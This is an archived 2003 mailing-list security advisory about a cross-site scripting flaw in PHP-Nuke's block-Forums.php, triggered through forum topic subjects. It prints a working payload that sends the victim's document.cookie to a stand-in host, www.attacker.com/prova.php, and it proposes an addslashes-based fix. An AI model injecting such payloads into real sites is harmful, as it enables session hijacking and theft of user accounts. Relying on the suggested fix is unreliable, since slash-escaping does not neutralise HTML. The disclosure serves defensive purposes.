PHP-Nuke block-Forums.php subject vulnerabilities

From: lethalmanat_private
Date: Mon Mar 31 2003 - 03:15:54 PST

  • Next message: Daniel Ahlberg: "GLSA: sendmail (200303-27)"

    
     ('binary' encoding is not supported, stored as-is)
    The block-Forums.php file have a vuln if an attacker
    insert a malformatted subject to a topic of Splatt
    Forum. A type of subject is:
    
    "><script>alert('bug'");</script>
    
    The 'alt' tag is closed by "> and the other text is
    normal html. This bug is very bad if a subject is:
    
    "><script>window.open('www.attacker.com/prova.php?cookie='+document.cookie);</script>
    
    And prova.php register cokkies in a file.
    
    The solution:
    
    Add under "$title2 = stripslashes($title2);" line, this
    line:
    "$title2 = addslashes($title2);"
    
    And now, backward any " there is a backslash!
    



    This archive was generated by hypermail 2b30 : Mon Mar 31 2003 - 15:25:28 PST